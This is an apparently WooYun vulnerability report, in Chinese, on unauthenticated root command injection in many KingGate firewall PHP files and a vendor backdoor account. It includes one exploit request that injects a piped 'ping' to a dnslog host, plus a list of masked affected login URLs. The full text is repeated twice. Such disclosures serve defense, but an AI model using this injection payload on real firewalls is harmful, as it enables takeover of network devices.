无需登录,远程任意命令执行(root权限),直接撸穿源代码,随意控制防火墙
该设计缺陷新旧版本的KingGate防火墙通杀
通过案例一 **.**.**.**/bugs/wooyun-2016-0176999 我已经撸到了源代码
在对源代码审计过程中发现N枚无需登录的远程命令执行漏洞
第一处 命令执行
\src\application\log\viewauditmail.php
关键性代码如下:
其中此处由于$_POST['chkbox'.$i]未过滤,造成命令执行
第二处:
src\application\firewall\schedule.php
关键代码
直接执行,get获取值
只要满足如下条件
利用方式如下:
**.**.**.**/src/application/firewall/schedule.php?IG_pagenum=5&IG_dir=a|ping werwrer3.xxxx.dnslog.info
postdata:
IG_operation=IG_delete&IG_checkbox=1
如图
cloudeye收到的dns解析请求(证明命令执行)
第三处命令执行:
src\application\vpn\tab\tab_show_ipsec_tunnellist.php
关键代码
可执行地方为
跟踪该变量$IG_tunnelname
同理,post可控即可造成命令执行
第四处:
src\application\log\stat_virus_name.php
其中$IG_sdate 可控,同理命令执行
第四处:\src\application\vpn\tab\tab_show_ipsec_status.php
其中$IG_tunnelname = $IG_tunnelname=$_GET['IG_tunnelname']; 直接执行命令
第五出:\src\application\vpn\tab\tab_show_c-to-s_status.php
第6处:src\application\firewall\getadress.php
第7处:\src\system\update.php
第8处:
\src\application\firewall\editschedule.php
第9处:
src/application/virus/sortbyname.php
第10处:
src/application/virus/sortbyip.php
第11处 官方后门:
src/system/backdoor.php
默认带有的后门管理员账号和密码储存在/etc/infogate/center/defaultclient.conf文件中
受影响的如下列表:
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**/src/system/login.php
**.**.**.**/src/system/login.php
**.**.**.**/src/system/login.php
https://**.**.**.**/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**/src/system/login.php
https://**.**.**.**/src/system/login.php
**.**.**.**/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**/src/system/login.php
**.**.**.**/src/system/login.php
**.**.**.**/src/system/login.php
https://**.**.**.**/src/system/login.php
https://**.**.**.**/src/system/login.php
https://**.**.**.**/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**/src/system/login.php
**.**.**.**/src/system/login.php
**.**.**.**/src/system/login.php
**.**.**.**/src/system/login.php
**.**.**.**/src/system/login.php
**.**.**.**/src/system/login.php
**.**.**.**/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**/src/system/login.php
**.**.**.**/src/system/login.php
**.**.**.**/src/system/login.php
https://**.**.**.**/src/system/login.php
**.**.**.**:8443/src/system/login.php
https://**.**.**.**/src/system/login.php
https://**.**.**.**/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**/src/system/login.php
https://**.**.**.**/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**/src/system/login.php
**.**.**.**:8443/src/system/login.php
无需登录,远程任意命令执行(root权限),直接撸穿源代码,随意控制防火墙
该设计缺陷新旧版本的KingGate防火墙通杀
该设计缺陷新旧版本的KingGate防火墙通杀
通过案例一 **.**.**.**/bugs/wooyun-2016-0176999 我已经撸到了源代码
在对源代码审计过程中发现N枚无需登录的远程命令执行漏洞
第一处 命令执行
\src\application\log\viewauditmail.php
关键性代码如下:
其中此处由于$_POST['chkbox'.$i]未过滤,造成命令执行
第二处:
src\application\firewall\schedule.php
关键代码
直接执行,get获取值
只要满足如下条件
利用方式如下:
**.**.**.**/src/application/firewall/schedule.php?IG_pagenum=5&IG_dir=a|ping werwrer3.xxxx.dnslog.info
postdata:
IG_operation=IG_delete&IG_checkbox=1
如图
cloudeye收到的dns解析请求(证明命令执行)
第三处命令执行:
src\application\vpn\tab\tab_show_ipsec_tunnellist.php
关键代码
可执行地方为
跟踪该变量$IG_tunnelname
同理,post可控即可造成命令执行
第四处:
src\application\log\stat_virus_name.php
其中$IG_sdate 可控,同理命令执行
第四处:\src\application\vpn\tab\tab_show_ipsec_status.php
其中$IG_tunnelname = $IG_tunnelname=$_GET['IG_tunnelname']; 直接执行命令
第五出:\src\application\vpn\tab\tab_show_c-to-s_status.php
第6处:src\application\firewall\getadress.php
第7处:\src\system\update.php
第8处:
\src\application\firewall\editschedule.php
第9处:
src/application/virus/sortbyname.php
第10处:
src/application/virus/sortbyip.php
第11处 官方后门:
src/system/backdoor.php
默认带有的后门管理员账号和密码储存在/etc/infogate/center/defaultclient.conf文件中
受影响的如下列表:
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**/src/system/login.php
**.**.**.**/src/system/login.php
**.**.**.**/src/system/login.php
https://**.**.**.**/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**/src/system/login.php
https://**.**.**.**/src/system/login.php
**.**.**.**/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**/src/system/login.php
**.**.**.**/src/system/login.php
**.**.**.**/src/system/login.php
https://**.**.**.**/src/system/login.php
https://**.**.**.**/src/system/login.php
https://**.**.**.**/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**/src/system/login.php
**.**.**.**/src/system/login.php
**.**.**.**/src/system/login.php
**.**.**.**/src/system/login.php
**.**.**.**/src/system/login.php
**.**.**.**/src/system/login.php
**.**.**.**/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**/src/system/login.php
**.**.**.**/src/system/login.php
**.**.**.**/src/system/login.php
https://**.**.**.**/src/system/login.php
**.**.**.**:8443/src/system/login.php
https://**.**.**.**/src/system/login.php
https://**.**.**.**/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**/src/system/login.php
https://**.**.**.**/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**:8443/src/system/login.php
**.**.**.**/src/system/login.php
**.**.**.**:8443/src/system/login.php